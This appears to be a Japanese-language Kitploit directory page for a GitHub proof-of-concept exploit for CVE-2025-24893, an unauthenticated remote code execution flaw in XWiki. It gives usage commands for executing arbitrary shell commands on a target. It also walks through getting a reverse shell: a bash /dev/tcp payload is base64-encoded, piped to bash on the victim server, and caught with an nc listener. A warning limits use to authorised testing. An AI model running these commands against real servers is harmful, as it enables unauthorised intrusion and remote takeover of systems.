Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-24893-PoC | Kitploit
ツール/GitHubGitHub/dhiaznaidi/cve-2025-24893-poc
エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育リモートアクセスツールペイロード開発
GitHubdhiaznaidi/cve-2025-24893-poc

CVE-2025-24893-PoC

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-24893 - XWiki リモートコード実行(RCE)

CVE-2025-24893 の更新された概念実証(PoC)エクスプロイトです。XWiki における認証不要の重大な RCE 脆弱性です。このバージョンはオリジナルを改良し、任意のシェルコマンド実行とクリーンなリバースシェル注入を可能にします。

作成者: HexHunter404


⚠️ 警告

このコードは教育目的および許可を得たペネトレーションテスト目的のみで提供されています。 自身が所有していない、または明示的なテスト許可を得ていないシステムに対して使用しないでください。


✨ 特徴

  • bash -c '<command>' によるコマンド実行をサポート
  • リバースシェルを完全サポート(Groovy の問題を回避するため base64 を使用)
  • コマンド出力の処理を改善
  • /xwiki パスを維持し、リダイレクトループを回避

🐍 使用方法

root@kitploit:~
python3 CVE-2025-24893-PoC.py -u http://<target>/xwiki -c "<command>"

🐚 リバースシェルを取得する

  1. リバースシェルを Base64 エンコードする
root@kitploit:~
echo "bash -i >& /dev/tcp/[IP]/4444 0>&1" | base64
  1. PoC を使用して送信する
root@kitploit:~
python3  CVE-2025-24893-PoC.py -u [URL] -c "echo [Base64 Payload] | base64 -d | bash"
  1. リスナーをセットアップする
root@kitploit:~
nc -lvnp 4444

成功すると、シェルを取得できます。

ツールをダウンロード